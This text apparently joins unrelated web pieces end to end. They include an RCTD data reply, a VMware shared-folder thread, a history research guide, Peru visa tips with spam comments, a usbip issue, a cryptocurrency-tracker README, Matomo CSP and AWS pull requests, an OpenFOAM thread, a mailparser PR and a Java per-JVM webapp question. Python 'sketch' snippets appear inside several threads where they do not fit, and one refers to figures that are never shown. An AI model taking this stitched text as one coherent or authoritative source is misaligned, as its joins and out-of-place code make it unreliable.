I am trying to understand what caused the difference. Thanks!

Hi~ Thank you for your interest in the data associated with the paper. We provided the h5ad files for users to reproduce our results.
So if you want to get the result for RCTD, you can use the R commands:

Convert("FigureData/Figure4/Dataset10_STARmap/Simulated_STARmap/starmap_sc_rna.h5ad", dest = "h5seurat", overwrite = TRUE)
Convert("FigureData/Figure4/Dataset10_STARmap/Simulated_STARmap/starmap_spatial.h5ad", dest = "h5seurat", overwrite = TRUE)

to obtain the h5seurat files as input. We have checked the result for RCTD, and we get the same result as what we shared in the folder. We don't know if different platforms may cause slightly different results. You can use the converted h5seurat files as input to compare the result for RCTD.
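For reference, a per-cell-type mean absolute difference like the one quoted above can be computed along these lines. This is only a sketch: loading the two result tables from their .txt files is assumed to be done separately, and the data layout (cell-type name mapped to per-spot proportions) is illustrative.

```python
# Sketch: mean absolute difference per cell type between two
# deconvolution result tables. Each table maps a cell-type name to
# the list of per-spot proportions predicted for that type.
def mean_diff_per_celltype(result_a, result_b):
    diffs = {}
    for celltype in result_a:
        a, b = result_a[celltype], result_b[celltype]
        diffs[celltype] = sum(abs(x - y) for x, y in zip(a, b)) / len(a)
    return diffs
```

Running it on the two RCTD outputs would reproduce the comparison the question reports.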
I am using Workstation 16 Pro (Version 16.2.1 build-18811642) and on my Kali Linux VM, I can't mount a folder from my host OS, which is Windows. This has worked for other virtual machines, but I am not sure why it has stopped working. This is how it looks in the VM settings (same as it looks for other VMs where mounting a folder from my host OS works). But nothing shows up here: It does show up in the /media/ folder, but the folder is empty (it's not empty on the host OS). Anyone have any ideas how I can solve this?

There's a known issue with VMware Tools; perhaps the following snippet helps.

VMware Tools Issues in VMware Workstation or Fusion: Shared Folders mount is unavailable on Linux VM. If the Shared Folders feature is enabled on a Linux VM while it is powered off, the shared folders mount is not available on restart. Note: This issue is applicable to VMware Tools running on Workstation and Fusion. If the VM is powered on, disable and enable the Shared Folders feature from the interface. For resolving the issue permanently, edit /etc/fstab and add an entry to mount the Shared Folders automatically on boot. For example, add the line: vmhgfs-fuse /mnt/hgfs fuse defaults,allow_other 0 0

Thanks for your answer. I added that line with my mount folder to /etc/fstab, but now I can't start the VM, so that was not so good. See this error: https://imgur.com/bzdZIG7 Luckily, I have a backup of this VM and can restore it, and then try the instructions here: https://kb.vmware.com/s/article/74650

Not sure why you are getting that error; never seen that one before after editing /etc/fstab. I take it that you have installed VMware Tools already? You could try and customize the power-on script yourself, but I would have to look up where it is located.

I followed this one https://kb.vmware.com/s/article/74650 , and after doing steps 1-5, it mounted the folder and I could view its contents.
But then I rebooted the machine and wanted to see if it automatically mounted after reboot, but it did not. Then I got the following messages:

sudo systemctl start mnt-hgfs.mount
Failed to start mnt-hgfs.mount: Unit mnt-hgfs.mount has a bad unit file setting.
See system logs and 'systemctl status mnt-hgfs.mount' for details.

systemctl status mnt-hgfs.mount
● mnt-hgfs.mount - VMware mount for SharedFolder
Loaded: bad-setting (Reason: Unit mnt-hgfs.mount has a bad unit file setting.)
Active: inactive (dead)

Do you have any ideas why it gives this error now but worked before a reboot? Once I fix this, it's gonna work after reboot and then everything is solved, so we are soon there.

No, sorry, I don't know. I do not use systemd for this myself; I only provided it because VMware recommends that article. If I do not really have to use systemd, I steer clear of it. In my Linux VMs the /etc/fstab solution works well. I'm still wondering what went wrong in the first place. Did you create the folder to mount hgfs at beforehand? E.g. can you try this:

sudo mkdir -p /mnt/hgfs/
sudo /usr/bin/vmhgfs-fuse .host:/ /mnt/hgfs/ -o subtype=vmhgfs-fuse,allow_other

Does that create the shared folder so you can at least use it?

Yeah, that works, and then I can use it and see the files if I run those commands. But I can't see the files after a reboot. That's fine for now, I guess; I'll just save and run those commands every time I boot the VM or when I need to use a shared folder. Thanks a lot for your help, appreciate it!

I have to look at this later on myself, as I note that I commented out the /etc/fstab line in my Debian. Sigh... perhaps I had the same thing as you, but just forgot about it as I don't use that VM often nowadays. FWIW, the default power-on script it complains about can be found under /etc/vmware-tools. Normally the default should be OK. Just pointing to the location where it probably goes wrong, looking at the screenshot you provided earlier on.
Too much other stuff going on for me now to chase it down myself.
How to Narrow Your Topic

"I'm writing a paper on World War II." Often students start their research with a very general topic, even though they may realize the topic is too large to deal with in a 10-15 page paper. Faculty and librarians tell them, "You have to narrow this down." But how do you narrow a topic?

- What discipline am I working in? If you are in a sociology class, ask a sociological question about World War II, like "How did WWII affect women?" If it's a political science class, your question might be something like "How did WWII affect presidential elections in the US?"
- What are some subsets or aspects of your topic? Some good aspects are:
- by place, such as a country or region
- by time period, such as a century, decade or year
- by population, such as men, women, ethnic group, youth, children or elderly

You can combine these ideas: "What were the major impacts of WWII on women in France, in the decade after the war?" More ideas in our brief tutorial on topic selection and narrowing.

Types of History topics

Three kinds of topics || Three research strategies

1. The evolution of Stokely Carmichael. This is a kind of biographical topic, which is pretty easy to get started with because the search term is obvious, but the topic still needs to be narrowed to say something meaningful in a short [10 pp] paper.
2. RFK and the Cuban Missile Crisis. This is a political history topic, with a specific event in mind and a specific individual. This is an easy kind of topic to start researching because there are two very obvious search terms, and the time frame is self-defined. However, it still needs to be narrowed to say something meaningful in a short paper.
3. Automobiles: Unions, Consumerism, and Social Change (1950s). This is a social history topic, not associated with a single person or a single event. This is a little harder to research because you need to specify what you mean in order to narrow the topic.
It helps to find the names of specific unions [in this case], and to consider what specific social changes you are interested in. You need to think: what kind of primary sources would give evidence of this/these social change/s? How will you prove there really was an impact on society from this phenomenon?

What kind of topic do you have? Where to search & what words to use. What kinds of evidence [i.e., primary sources] do you want to find?

- Biographical topics: What kinds of primary sources will give evidence of the changes this person went through or their impact on society? Why should we care about this person?
- Event-based topics: You need to think: what kind of primary sources will give evidence of a relationship between the person and the event? Why should we care?
- Social history topics: You need to think: what kind of primary sources would give evidence of this/these social change/s? How will you prove there really was an impact on society from this phenomenon?

The Research Process

Choose a topic. Do a brain dump: note down what you already know about your topic, including names of people, organizations, companies, the time period you are interested in, and places of interest [countries, regions, cities]. Fill in the gaps in your knowledge: get background information from encyclopedias or other secondary sources. Wikipedia can be good here. Select the best places/databases to find information on your topic. Look under the History Databases tab of this guide for article database suggestions, or use a catalog like Oskicat or Melvyl to search for books and other resources. Use nouns from your brain dump as search terms. Evaluate what you find. Change search terms to get closer to what you really want.

Refine Your Topic

- Using the information you have gathered, determine if your research topic should be narrower or broader. You may need to search basic resources again using your new, focused topics and keywords.
Take a look at this short tutorial on beginning your research for more ideas.

Choosing a Discipline

So, how do you know what disciplines you should use?

- Look at the department your class is offered by. That's a pretty obvious clue.
- Think about what other disciplines might discuss your topic. For instance, a paper on education in Chile could involve both Education and Latin American Studies.

What do you do with this information? Search in the article databases dedicated to those disciplines. Here's a list of databases for each discipline, by campus.

- Berkeley databases
- Davis databases
- Irvine databases
- Los Angeles databases
- Merced databases
- Riverside databases
- San Diego databases
- Santa Barbara databases
- Santa Cruz
Philippine passport holders do not have to apply for a tourist visa before coming to Peru. You find the proof either on this site when opening the PDF document "Countries with Visa Requirements" (published by the Foreign Affairs Ministry) or on the website of DIGEMIN, Peru's immigration office, under this link ("") (look at page three, "Asia"; under Filipinas you see "NO", so no visa is necessary for the maximum stay of 183 days).

After reading a few of the blog posts on your website, I really like your way of blogging. I bookmarked it to my bookmark website list and will be checking back soon. Please check my website as well and let me know what you think.

So you should have at least (!) three hours between your flights. Please note that it is not uncommon that international flights are not on time and that domestic flights may change their departure time.

Note! The second time you enter Peru it may be harder to get 183 days; sometimes they will give you 30 or 60 days even if you ask for more. There are also cases where immigration staff have asked for money under the table to give you more days. Sometimes it takes a little luck to get the number of days you want, but try to be firm and insist on the number of days you need. If you received a high number of days on your tourist visa, one strategy is to wait until your tourist visa has fewer than 30 days left before leaving and re-entering the country, so you don't risk coming back with a new tourist visa that would shorten your stay.

These tips also worked as a great way to understand that someone else has the same desire as I do to learn a great deal more about this topic.
I know there will be many more enjoyable times ahead for folks who start reading.

If you find a way to get employed, then you must fill in this form: and pay $49.90 USD to the Banco de la Nación. You bring the receipt of the payment along with a copy of your passport and a copy of your TAM card (the paper you received at the airport when entering Peru).

Travelers need a passport valid for at least half a year, with at least two free pages in the visa section, when entering Peru. To avoid any possible complications when entering Peru, I would get in contact with the closest Peruvian consulate. I do not know how long it will take to obtain the visa, as processing times and workload at the consulate vary, so best ask at the consulate where you will apply.

I am trying to enter the country and I was wondering if there are any restrictions for people who have been convicted of felonies in the USA?

Please note that it is your nationality, and not a potential residence permit in another country, that is the deciding factor for whether you need a visa or not! Generally, citizens of the countries in the list below do not have to apply for a visa at an embassy or consulate before entering Peru. A passport valid for at least 6 months, with at least two free pages in the visa section, is sufficient to get a Tourist Visa (basically it is only an entry stamp) directly at the border or the airport.

I am Hernan, a Filipino. I am going to travel to Peru on the 24th. How long will a tourist visa be valid?
Device disconnected, reconnection impossible

Hello, I use this add-on to connect a Warema Stick from an RPi 3 (USBip server) to my main RPi 4 where HA runs. On the first start of the system (e.g. after a power outage) the add-on starts correctly and the connection stays active until some network error stops the connection. However, instead of detaching the device cleanly (so it can be reattached after a restart of the add-on), the add-on gets into some kind of error state where the device isn't available on the HA host but is also not detached, leading to a fault that can only be fixed by restarting the USBip server. The log outputs the following message when attempting to reconnect while in this state:

cont-init: info: /etc/cont-init.d/create_devices.sh exited 0
cont-init: info: running /etc/cont-init.d/load_modules.sh
cont-init: info: /etc/cont-init.d/load_modules.sh exited 0
s6-rc: info: service legacy-cont-init successfully started
s6-rc: info: service legacy-services: starting
services-up: info: copying legacy longrun usbip (no readiness notification)
services-up: info: copying legacy longrun usbipd (no readiness notification)
[19:09:14] INFO: Starting the USBIP Daemon
[19:09:14] INFO: Attaching usbip devices
usbipd: info: starting usbipd (usbip-utils 2.0)
usbipd: info: listening on <IP_ADDRESS>:3240
usbipd: info: listening on :::3240
s6-rc: info: service legacy-services successfully started
++ mount -o remount -t sysfs sysfs /sys
++ /usr/sbin/usbip --debug attach -r <IP_ADDRESS> -b 1-1.2
usbip: debug: usbip.c:129:[run_command] running command: `attach'
usbip: error: tcp connect
[19:09:17] WARNING: usbip crashed, halting add-on
[19:09:17] INFO: usbip stopped, restarting...
s6-rc: info: service legacy-services: stopping
usbipd: info: shutting down usbipd
[19:09:17] INFO: usbipd stopped, restarting...

The add-on should normally detach devices when stopped, but it doesn't do this in this case... How could I fix this?
Best regards, Aaron Eisele @Aaroneisele55

The most recent update I made was adding a "shutdown" script: https://github.com/irakhlin/hassio-usbip-mounter/blob/main/rootfs/usr/bin/unmount_devices If you shut down the add-on, it will correctly detach from the server, and thus the device can be reconnected. Unfortunately, if there is some kind of network error or power outage and the script does not run, the detach will not happen. From playing around with usbip outside of Home Assistant, I have noticed that this issue will occur regardless: if the client does not correctly detach from the server, the server ends up in a weird state. I will have to look into this to see if it's something that can easily be solved.

I just thought about it, and I think I have found a possible solution: if the add-on crashes due to not being cleanly detached at some point, couldn't we just run the detachment script (from #6) when usbipd crashes, and then reattach the devices so the problematic state is resolved?
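The proposed recovery (run the detach, then reattach) could be sketched roughly as below. This is an assumption about how such a wrapper might look, not the add-on's actual code: the port number and bus ID are illustrative, and only the `usbip attach`/`usbip detach` subcommands from usbip-utils are used.

```python
import subprocess

def recovery_commands(remote, busid, port="00"):
    """Build the command lines for a detach-then-reattach cycle.
    The detach clears a half-attached state on the client; the
    attach then re-imports the device from the usbip server."""
    return [
        ["usbip", "detach", "-p", port],
        ["usbip", "attach", "-r", remote, "-b", busid],
    ]

def recover(remote, busid, port="00"):
    for cmd in recovery_commands(remote, busid, port):
        # check=False: the detach is allowed to fail when nothing
        # is attached; only the final attach needs to succeed.
        subprocess.run(cmd, check=False)
```

Whether this clears the server-side state after an unclean disconnect would still need testing, as the discussion notes the server itself can end up stuck.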
Fullstack (React) Capstone Project from Thinkful's Fullstack Web Development program.

- Do something interesting or useful.
- Be a fullstack app using HTML, CSS, React, Node, Express, and Mongoose.
- The client and API should be deployed separately and stored in separate GitHub repos.
- Both client- and server-side code should be tested, and you should use TravisCI for continuous integration and deployment.
- Your app should be responsive, and should work just as well on mobile devices as it does on desktop devices.
- All code should be high quality, error free, commented as necessary, and clean.
- The styling on your client should be polished.
- Your app should have a landing page that explains what the app does and how to get started, in addition to pages required to deliver the main functionality.
- provide DEMO account credentials
- username: demo
- password: demopassword

CryptoKeeper is a cryptocurrency tracking application using real-time market data via Socket.IO and Cryptocompare. Current cryptocurrencies tend to be quite volatile compared to more traditional currencies and stocks, with prices sometimes dropping or increasing drastically in a matter of hours. By registering for an account, users can overcome the uncertainty of keeping up with the market by creating custom events to monitor a given currency for a specific condition (e.g. Bitcoin just reached $12k, Ethereum dropped 5%). If and when a condition is eventually met, a notification is sent to the user via text message and/or email indicating the current price. Users have control over each event condition as well as the method of delivery and the custom message that will be displayed with the notification.
- A BDD / TDD assertion library for node and the browser, works seamlessly with Mocha testing framework among others - A plugin for Chaijs that integrates HTTP testing with Chai assertions - Continuous Integration testing that tests latest build before deploying to production environment - Task manager - Node package that restarts server and made for use with Gulp tasks - Automation tool to make the development process faster. - Allows for multiple screens to reload live and all interactions are in synchronization, mirroring actions across every browser on any device located on local network. - compatible with Gulp - Gulp + gulp-nodemon + Browsersync combine to streamline the entire development process - Hosted on Heroku's Cloud Application Platform - (PaaS) platform as a service - Cloud MongoDB hosting provided by mLab - All tests handled by Mocha.js using Chaijs and chai-http assertion libraries to test API endpoints - Used by TravisCI to test master branch before deploying to production environment on Heroku - A cron job is dispatched every 10min to check all user event conditions against the current cryptocurrency prices. If a condition passes, notifications are sent to users via sms text message using Twilio services and / or via email using Mailgun services. - User authentication is handled using Passport.js with a JWT authentication token strategy. User requests must provide a valid JWT auth token in header to access protected endpoints. Token renews itself automatically and expires after 7 days. - Image files are stored in base64 binary encoding using GridFS, a MongoDB specification that saves larger files in chunks and combines these chunks on request to serve the original file back to client. Video file storage to be implemented soon. - Market data is powered by the Cryptocompare API and websocket
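The event-condition check that the cron job described above performs can be sketched as a small predicate. This is a sketch only; the event shapes (`above`, `below`, `drop_pct`) are assumptions for illustration, not CryptoKeeper's actual schema.

```python
# Sketch of an event-condition check as the 10-minute cron job
# might run it against current prices. Event shapes are illustrative.
def condition_met(event, current_price, reference_price=None):
    kind, value = event["type"], event["value"]
    if kind == "above":        # e.g. "Bitcoin just reached $12k"
        return current_price >= value
    if kind == "below":
        return current_price <= value
    if kind == "drop_pct":     # e.g. "Ethereum dropped 5%"
        if reference_price is None:
            return False       # no baseline to measure the drop from
        return current_price <= reference_price * (1 - value / 100)
    raise ValueError("unknown event type: %s" % kind)
```

When the predicate returns true, the notification step (Twilio SMS and/or Mailgun email, as described above) would fire for that user.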
Fixes #17773 by setting a Content-Security-Policy which is fairly loose at this stage. I think we should only be using Content-Security-Policy-Report-Only for at least one or two releases as I'm sure there are a lot of people with weird setups where the CSP will break in fascinating ways. I still think it is worth creating a secure one for Matomo as it will make Matomo a lot more secure, but also provide an option to fall back to Report-Only or disable it, for setups where using one is not possible. 👍 be good indeed to have such an option to disable it, or using report-only. And could indeed start with report-only. Maybe in dev mode we would always from beginning use the real one so it's easier to make things compatible? might not make sense though just some thoughts. I suppose this would give some people more time to adjust their setup if needed. They might not notice these reports but at least they might notice it in the changelog maybe? We could have a setting to choose between enabled, disabled, or report only mode, defaulting to disabled or report only. I've added a couple of settings, one to enable/disable and one to specify a report-uri. CSP is disabled by default for now, specifying a report-uri will switch it to Content-Security-Policy-Report-Only 👍 @justinvelluppillai it seems report-uri is deprecated see https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/report-uri ? Could maybe remove this feature and then have only one setting for the three different modes (disabled, report, enabled)? Or seems it might be replaced by https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/report-to ? I don't know how commonly used it is. If it's not commonly used that often someone could maybe add this feature as a plugin. 
While report-uri seems to be deprecated, it is the only parameter actually supported by browsers: report-to is not supported by any non-Chrome browser: https://caniuse.com/mdn-http_headers_report-to Content-Security-Policy-Report-Only also makes sense without a report-uri (especially during development), as it will log violations in the console.

Huh, I didn't notice that in my investigations. A couple of possible approaches: Both are trivial to implement; option 1 provides more possible configurations, but I lean towards option 2 for simplicity, if everyone agrees?

I think we could either add two settings (one switching between on, report-only and off, and one specifying the report-uri (or being empty)) or use three settings (like e.g. in https://github.com/Chocobozzz/PeerTube/blob/develop/config/default.yaml#L151-L154). I suppose using two settings could work and let us extend it better in the future if we were to decide to add more features (which isn't currently needed). So something like you mention: csp_enabled = 0/1 and csp_report_only = 0/1 # Only does something if csp is enabled

@justinvelluppillai it seems like the Page Overlay feature doesn't work yet when the URL is from a different page? I just tested it and it won't load the site.

@tsteur with the default settings we've chosen (report-only) it should still work as normal but report some issues. I can modify the Page Overlay feature to use a different (or no) CSP. I will take a look at getting the Page Overlay feature running locally, then see what's best. FYI, I tested in report mode (not report-only).

This issue is in "needs review" but there has been no activity for 7 days. ping @matomo-org/core-reviewers

@sgiehl it'd be great if you could give this a check over, and if all is OK we can merge, as it won't have too much impact until we enable it.

@justinvelluppillai Sure. Feel free to simply use the GitHub feature to request reviews in the future if you need one ;-)
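The two-setting scheme discussed above (csp_enabled plus csp_report_only) essentially boils down to picking one of two response-header names. A minimal sketch of that decision, not Matomo's actual implementation:

```python
def csp_header(csp_enabled, csp_report_only, policy):
    """Return the (header-name, value) pair to emit, or None when CSP
    is disabled. csp_report_only only has an effect when csp_enabled
    is set, matching the proposed settings."""
    if not csp_enabled:
        return None
    name = ("Content-Security-Policy-Report-Only" if csp_report_only
            else "Content-Security-Policy")
    return (name, policy)
```

Keeping the two flags separate (rather than one three-valued setting) leaves room for extra CSP options later without changing the existing keys.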
Add AwsCommunity::Resource::Lookup resource type. Issue #, if available: Description of changes: Add AwsCommunity::Resource::Lookup resource type.

Tests excerpts

Unit tests excerpts
[...]
[INFO] --- jacoco:0.8.9:check (jacoco-check) @ awscommunity-resource-lookup-handler ---
[...]
[INFO] Analyzed bundle 'awscommunity-resource-lookup-handler' with 10 classes
[INFO] All coverage checks have been met.
[...]

Contract tests excerpts
[...]
13 passed, 2 skipped, 9 deselected, 1 warning in 1021.84s (0:17:01)
[...]

By submitting this pull request, I confirm that you can use, modify, copy, and redistribute this contribution, under the terms of your choice.

I like this a lot! A few feature requests: Can we add a Serial or Trigger parameter (like AwsCommunity::Time::Sleep), so that you can refresh the value without changing the query? (It's not 100% clear to me from the schema whether changing the query triggers a new lookup, so making that clearer might be a good thing too.) Would AwsCommunity::Resource::Lookup be a better name, if that's the only output it can generate? And some questions related to that: I think there is also a need for a way to get other properties of a resource. This could be part of this (there could be a JmesPathSelectorQuery and a JmesPathOutputQuery) or a separate thing (AwsCommunity::Resource::Read). Also a way to get a list of resources / identifiers / properties (in that case I think it makes more sense to have an AwsCommunity::CloudControlQuery::List and an AwsCommunity::CloudControlQuery::Get resource, and not the two different kinds of JmesPath). (E.g. I want all the subnets of one VPC that have the type=private tag.)

Can we add a Serial or Trigger parameter [...] I am currently looking into adding and testing a LookupSerialNumber property in the schema for this. Added in a new commit.

[...] (It's not a 100% clear to me from the schema if changing the query triggers a new lookup, so making that more clear might be a good thing too)?
Added this clarification to the description of the relevant property in the schema in the same new commit as well. Added changes - no code changes made. Contract tests excerpts: 13 passed, 2 skipped, 9 deselected, 1 warning Small schema and docs updates made. No code changes. Contract tests excerpts: 13 passed, 2 skipped, 9 deselected, 1 warning Another small documentation-related update made, in the schema. No code changes. Contract tests excerpts: 13 passed, 2 skipped, 9 deselected, 1 warning Made additional changes to the README.md file. Please review - thanks! Added changes for using a namespace for the primary ID. Tests excerpts: [...] [INFO] ------------------------------------------------------- [INFO] T E S T S [INFO] ------------------------------------------------------- [INFO] Running com.awscommunity.resource.lookup.LookupHelperTest [INFO] Tests run: 20, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1.508 s - in com.awscommunity.resource.lookup.LookupHelperTest [INFO] Running com.awscommunity.resource.lookup.ReadHandlerTest [INFO] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1.779 s - in com.awscommunity.resource.lookup.ReadHandlerTest [INFO] Running com.awscommunity.resource.lookup.CreateHandlerResourceLookupTest [INFO] Tests run: 9, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.09 s - in com.awscommunity.resource.lookup.CreateHandlerResourceLookupTest [INFO] Running com.awscommunity.resource.lookup.CreateHandlerTest [INFO] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.037 s - in com.awscommunity.resource.lookup.CreateHandlerTest [INFO] Running com.awscommunity.resource.lookup.ListHandlerTest [INFO] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.03 s - in com.awscommunity.resource.lookup.ListHandlerTest [INFO] Running com.awscommunity.resource.lookup.UpdateHandlerTest [INFO] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.041 s - in 
com.awscommunity.resource.lookup.UpdateHandlerTest [INFO] Running com.awscommunity.resource.lookup.ClientBuilderTest [INFO] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1.44 s - in com.awscommunity.resource.lookup.ClientBuilderTest [INFO] Running com.awscommunity.resource.lookup.TagHelperTest [INFO] Tests run: 16, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.013 s - in com.awscommunity.resource.lookup.TagHelperTest [INFO] Running com.awscommunity.resource.lookup.CreateHandlerStabilizeTest [INFO] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.005 s - in com.awscommunity.resource.lookup.CreateHandlerStabilizeTest [INFO] Running com.awscommunity.resource.lookup.DeleteHandlerTest [INFO] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.02 s - in com.awscommunity.resource.lookup.DeleteHandlerTest [INFO] [INFO] Results: [INFO] [INFO] Tests run: 63, Failures: 0, Errors: 0, Skipped: 0 [...] [...] INFO] --- jacoco:0.8.9:check (jacoco-check) @ awscommunity-resource-lookup-handler --- [...] [INFO] Analyzed bundle 'awscommunity-resource-lookup-handler' with 10 classes [INFO] All coverage checks have been met. [...] 13 passed, 2 skipped, 9 deselected, 1 warning
Hi, I have a problem with the parallel execution of OpenFOAM. I've written a new boundary condition which calculates the inlet velocity profile of a square duct. If I run my case on one processor, I just have to calculate the values a single time when starting my calculation (if (ldb.timeIndex() < 1) ...). If I want to run my calculation in parallel mode, I need to perform the calculation every time the program accesses the boundary condition (which is very often), and so I "waste" a lot of calculation time on a problem that doesn't change over time. If I don't do so, the velocity at my patch is set to some time-varying value, from which I guess that it's calculated during execution. How can I fix this problem? I've already consulted the forum and the wiki (I started with the parabolicinletVelocityprofile for writing my BC) but was unable to find an appropriate hint on how to do this. Am I right if I guess that the problem is connected with the exchange of information between the processors? Thanks in advance

Hi Christian, why do you need to calculate your BC only once in serial and many times in parallel? It sounds strange to me... However, you can let all your processes calculate your BC when needed. I mean, do your computation on each processor at the same time, instead of doing it on the master node and sending the result to the other processes... I hope this can help

Hello Francesco, thanks for your reply. Could you give me a hint on how to do so, because I'm neither that familiar with OpenFOAM nor with C++. I guess a good idea would be that the program checks whether a file with the calculated values exists and, if so, reads it as input. Otherwise the program should perform the calculation and write the output to the specific file. Thanks in advance

Hello Christian. It's not easy to give you a hint, because I don't know exactly what your problem is...
If you can calculate the values you need, I guess you can avoid writing them to a file. If your serial version works as you expect, simply let all the processors of a parallel run do the same thing. If you rely on a file, you have to be sure that it exists at the beginning of the simulation, if you want to keep things simple. Otherwise, if the file doesn't exist, simply calculate the values and store them in the BC data structure, without writing them to a file and reading them back again. If you want to store those values for any reason, you can let only the master process write them: [put your code here] If you want to make the master write the file and the rest wait for it to finish, that is a bit more complicated... I hope this can help,

Hi Francesco, thanks a lot for your help. I finally managed the problem with the parallel run by creating and writing a variable after the first calculation. So every processor can perform the calculation if needed; otherwise the data is just read out of the value variable. For a total beginner in C++, the OpenFOAM code is really difficult, because everything is coded so efficiently. If you have any interest, I can post my new boundary condition for the velocity profile of a square duct.

Hi Christian, I started C++ mainly for OpenFOAM, and from my point of view it is not so difficult, because everything is coded so efficiently and in an elegant way! Try to put your hands into a badly written parallel code. It can be a nightmare, believe me... It would be nice to have a look at the BC, if you can post it, thanks.

Hi Francesco, maybe you're right. At the moment I'm updating the document management system of our institute, which is written in PHP. The scripts were created quick and dirty by someone several years ago. Even if PHP is very simple to understand, all the encoded layout options really got to me.
Compared to that, OpenFOAM code is more than gold. Attached you can find my new boundary condition, which is an adaptation of the parabolicVelocityProfile BC. If you find any major mistakes or so, please report.
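The fix described above (compute the profile once on first access, store it, reuse it afterwards) is plain memoization, done independently on every processor. A minimal sketch of the pattern in Python; the real BC is OpenFOAM C++, and the class and method names here are made up:

```python
class InletProfileBC:
    """Sketch of a BC that computes its velocity profile once per process.

    Hypothetical names; the actual boundary condition is OpenFOAM C++.
    """

    def __init__(self, points):
        self.points = points
        self._profile = None  # cache; stays None until first evaluation

    def _compute_profile(self):
        # Stand-in for the expensive square-duct profile calculation.
        return [4.0 * y * (1.0 - y) for y in self.points]

    def update(self):
        # Called very often by the solver; the expensive work runs only
        # once, after that the cached values are returned unchanged.
        if self._profile is None:
            self._profile = self._compute_profile()
        return self._profile


bc = InletProfileBC([0.0, 0.25, 0.5, 0.75, 1.0])
first = bc.update()
second = bc.update()  # served from the cache, no recomputation
```

In the OpenFOAM version the cache would be a member field of the BC, filled on the first evaluation (e.g. in updateCoeffs()), which is exactly the "creating and writing a variable after the first calculation" Christian describes.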
OPCFW_CODE
Parse To: header into a list of recipients instead of a string.

To store multi-recipient messages I need a correctly structured JSON with the "To:" field returned as a list. Just split()'ting by commas doesn't cut it, since the RFC-2822 address specification is more complex. Fortunately, Python's email.utils.getaddresses handles this. It even splits individual addresses into 'real name' and 'email address' parts.

Output using tests/mails/mail_test_1:

[...]
mailparser_1 | "subject": "письмо уведом-е",
mailparser_1 | "to": [
mailparser_1 | [
mailparser_1 | "",
mailparser_1 | <EMAIL_ADDRESS>
mailparser_1 | ]
mailparser_1 | ],
mailparser_1 | "receiveds": [
[...]

Another (real) test message of mine containing the following 'To:':

To<EMAIL_ADDRESS>"Test recipient, containing comma"<EMAIL_ADDRESS>

gets parsed into:

mailparser_1 | "to": [
mailparser_1 | [
mailparser_1 | "",
mailparser_1 | <EMAIL_ADDRESS>
mailparser_1 | ],
mailparser_1 | [
mailparser_1 | "Test recipient, containing comma",
mailparser_1 | <EMAIL_ADDRESS>
mailparser_1 | ]
mailparser_1 | ],
mailparser_1 | "receiveds": [

(mailparser_1 is Docker Compose's leading prefix, since I'm using it to hack, see #12)

Also, FYI, I'm about to do the same for the 'Headers:' field.

Coverage increased (+0.03%) to 91.503% when pulling df5bd6f64a6c83e0f6cd7649dbd279fc32918b8d on pataquets:parse-to-into-a-list into 3015f639de02e796d057cf1534af27e5f6a7c77d on SpamScope:develop.
@pataquets very good PR. Thanks a lot for your contribution.

@pataquets in this commit I fixed 2 things:
- your change is in the to_ property, so it's available in all code
- I replaced getaddresses with the more specific parseaddr

I also fixed the unittests.
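The splitting behaviour described in the PR can be reproduced directly with the standard library. A minimal sketch; the header string below is a made-up example, not one of the project's test mails:

```python
from email.utils import getaddresses

# An RFC 2822 'To:' header where a naive split(',') would break the
# quoted display name containing a comma.
to_header = 'plain@example.com, "Test recipient, containing comma" <comma@example.com>'

# getaddresses takes a list of header values and returns
# (real name, email address) pairs.
recipients = getaddresses([to_header])
for name, addr in recipients:
    print(name, addr)
```

A naive to_header.split(',') would cut the quoted display name in half; getaddresses respects the RFC 2822 quoting rules and still yields exactly two recipients.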
GITHUB_ARCHIVE
Running webapps in separate processes

I'd like to run a web container where each webapp runs in its own process (JVM). Incoming requests get forwarded by a proxy webapp running on port 80 to individual webapps, each (webapp) running on its own port in its own JVM. This will solve three problems:

1. Webapps using JNI (where the JNI code changes between restarts) cannot be restarted. There is no way to guarantee that the old webapp has been garbage-collected before loading the new webapp, so when the code invokes System.loadLibrary() the JVM throws: java.lang.UnsatisfiedLinkError: Native Library x already loaded in another classloader.
2. Libraries leak memory every time a webapp is reloaded, eventually forcing a full server restart. Tomcat has made headway in addressing this problem but it will never be completely fixed.
3. Faster restarts. The mechanism I'm proposing would allow near-instant webapp restarts. We no longer have to wait for the old webapp to finish unloading, which is the slowest part.

I've posted an RFE here and here. I'd like to know what you think. Does any existing web container do this today? I'm closing this question because I seem to have run into a dead end: http://tomcat.10.n6.nabble.com/One-process-per-webapp-td2084881.html As a workaround, I'm manually launching a separate Jetty instance per webapp.

Can't you just deploy one app per container and then use DNS entries and reverse proxies to do the exact same thing? I believe Weblogic has something like this in the form of managed domains.

By providing a single management interface for multiple webapps you could gain productivity that is not possible with separate containers today. For example: when a user asks to reload a webapp, you could have a preloaded container-minus-webapp sitting idle in the background. When the reload request comes in you simply shut down the old JVM and load the new webapp into the waiting JVM.
If I were to implement this today, the act of shutting down an instance and relaunching it serially would take a lot longer (and thereby reduce development productivity).

No, AFAIK, none of them do, probably because Java web containers emphasize following the servlet API - which spins off a thread per HTTP request. What you want would be a fork at the JVM level - and that simply isn't a standard Java idiom.

I am not asking for each HTTP request to run in its own JVM. I am isolating each webapp in its own JVM, not each request of the same webapp.

If I understand correctly you are asking for the standard features of enterprise-quality servers such as IBM's WebSphere Network Deployment (disclaimer: I work for IBM), where you can distribute applications across many JVMs, and those JVMs can in fact be distributed across many physical machines. I'm not sure that your fundamental premise is correct though. It's not necessary to restart a whole JVM in order to deploy a new version of an application. Many app servers will use a class-loader strategy that allows them to discard a version of an app and load a new one.

You misunderstood my question. I don't need a webapp to span JVMs. As far as I know there is no safe way of restarting a JNI application short of restarting the entire JVM, so a special class-loader strategy will not work here.
